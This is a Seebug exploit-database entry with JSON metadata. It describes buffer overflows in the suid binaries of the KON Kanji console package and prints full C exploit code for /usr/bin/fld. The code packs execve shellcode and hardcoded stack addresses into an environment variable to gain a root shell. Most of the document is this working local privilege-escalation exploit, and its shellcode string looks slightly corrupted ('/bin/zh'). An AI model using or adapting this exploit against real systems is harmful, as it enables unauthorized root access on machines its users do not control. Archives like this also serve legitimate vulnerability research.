ID SSV:73923 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
source: http://www.securityfocus.com/bid/1371/info
KON (Kanji On Console) is a package for displaying Kanji text under Linux and comes with two suid binaries which are vulnerable to buffer overflows. "fld", one of the vulnerable programs, accepts options input from a text file. Through this mechanism it is possible to input arbitrary code into the stack and spawn a root shell. The other binary, kon, suffers from a buffer overflow as well. The buffer overflow in kon can be exploited via the -StartupMessage command line option, and fld via the command line options: -t bdf <file to be read>
/* Exploit code for /usr/bin/fld
Compile with : gcc -o xp xp.c
Made by : E-Ligth (Hugo Oliveira Dias) 01/08/2000
*/
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#define OFFSET 0
#define BUFFSIZE 541
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/zh";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
int main(int argc,char *argv[])
{
int bsize = BUFFSIZE;
int offset = OFFSET;
int i;
long *addr_ptr, addr;
char *ptr,*buf,*env;
char arg[30];
if (!(buf = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
ptr = buf;
for (i = 0; i < bsize; i++)
*(ptr++) = shellcode[i];
buf[519] = 0x3c; /* Saved EBP 0xbffffa3c */
buf[520] = 0xfa;
buf[521] = 0xff;
buf[522] = 0xbf;
buf[523] = 0x10; /* Return Address 0xbffff710 */
buf[524] = 0xf7;
buf[525] = 0xff;
buf[526] = 0xbf;
buf[527] = 0x90; /* fp variable 0x804bf90 */
buf[528] = 0xbf;
buf[529] = 0x04;
buf[530] = 0x08;
buf[531] = 0xef; /* variable thats shouldn?t be destroyed 0xbffffbef */
buf[532] = 0xfb;
buf[533] = 0xff;
buf[534] = 0xbf;
buf[535] = 0x60; /* variable thats shouldn?t be destroyed 0x40013460 */
buf[536] = 0x34;
buf[537] = 0x01;
buf[538] = 0x40;
memcpy(buf,"-type \"",7);
buf[540] = '\0';
buf[539] = '\"';
memcpy(arg,"-type bdf ./code",16);
arg[16] = '\0';
env = (char *) malloc(bsize + 10);
memcpy(env,"EGG=",4);
strcat(env,buf);
putenv(env);
system("/bin/bash");
exit(0);
{"lastseen": "2017-11-19T16:32:23", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "_object_type": "robots.models.seebug.SeebugBulletin", "status": "cve,poc", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2017-11-19T16:32:23"}, "dependencies": {"references": [], "modified": "2017-11-19T16:32:23"}, "vulnersScore": 0.4}, "href": "https://www.seebug.org/vuldb/ssvid-73923", "references": [], "history": [], "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "id": "SSV:73923", "title": "Mandrake 7.0/7.1,RedHat Kon2 0.3.9 fld Input File Overflow", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 3, "sourceData": "\n source: http://www.securityfocus.com/bid/1371/info\r\n\r\nKON (Kanji On Console) is a package for displaying Kanji text under Linux and comes with two suid binaries which are vulnerable to buffer overflows. "fld", one of the vulnerable programs, accepts options input from a text file. Through this mechanism it is possible to input arbitrary code into the stack and spawn a root shell. The other binary, kon, suffers from a buffer overflow as well. The buffer overflow in kon can be exploited via the -StartupMessage command line option, and fld via the command line options: -t bdf <file to be read> \r\n\r\n/* Exploit code for /usr/bin/fld\r\n \r\n Compile with : gcc -o xp xp.c\r\n \r\n Made by : E-Ligth (Hugo Oliveira Dias) 01/08/2000 \r\n*/\r\n\r\n\r\n #include <string.h>\r\n #include <stdlib.h>\r\n #include <stdio.h>\r\n\r\n #define OFFSET 0\r\n #define BUFFSIZE 541\r\n #define NOP 0x90\r\n\r\n char shellcode[] =\r\n "\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b"\r\n "\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd"\r\n "\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/zh";\r\n\r\n unsigned long get_esp(void) {\r\n __asm__("movl %esp,%eax");\r\n }\r\n\r\n int main(int argc,char *argv[])\r\n {\r\n int bsize = BUFFSIZE;\r\n int offset = OFFSET;\r\n int i;\r\n long *addr_ptr, addr;\r\n char *ptr,*buf,*env;\r\n char arg[30];\r\n\r\n if (!(buf = malloc(bsize))) {\r\n printf("Can't allocate memory.\\n"); \r\n exit(0);\r\n }\r\n \r\n \r\n ptr = buf;\r\n for (i = 0; i < bsize; i++)\r\n \r\n *(ptr++) = shellcode[i];\r\n \r\n buf[519] = 0x3c; /* Saved EBP 0xbffffa3c */ \r\n buf[520] = 0xfa;\r\n buf[521] = 0xff;\r\n buf[522] = 0xbf;\r\n \r\n buf[523] = 0x10; /* Return Address 0xbffff710 */ \r\n buf[524] = 0xf7;\r\n buf[525] = 0xff;\r\n buf[526] = 0xbf;\r\n \r\n buf[527] = 0x90; /* fp variable 0x804bf90 */\r\n buf[528] = 0xbf;\r\n buf[529] = 0x04;\r\n buf[530] = 0x08;\r\n \r\n buf[531] = 0xef; /* variable thats shouldn?t be destroyed 0xbffffbef */\r\n buf[532] = 0xfb; \r\n buf[533] = 0xff;\r\n buf[534] = 0xbf;\r\n \r\n buf[535] = 0x60; /* variable thats shouldn?t be destroyed 0x40013460 */\r\n buf[536] = 0x34;\r\n buf[537] = 0x01;\r\n buf[538] = 0x40;\r\n \r\n memcpy(buf,"-type \\"",7);\r\n buf[540] = '\\0';\r\n buf[539] = '\\"';\r\n \r\n memcpy(arg,"-type bdf ./code",16);\r\n arg[16] = '\\0'; \r\n \r\n env = (char *) malloc(bsize + 10);\r\n memcpy(env,"EGG=",4);\r\n \r\n strcat(env,buf);\r\n \r\n putenv(env);\r\n \r\n system("/bin/bash");\r\n \r\n exit(0);\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-73923", "type": "seebug", "objectVersion": "1.4"}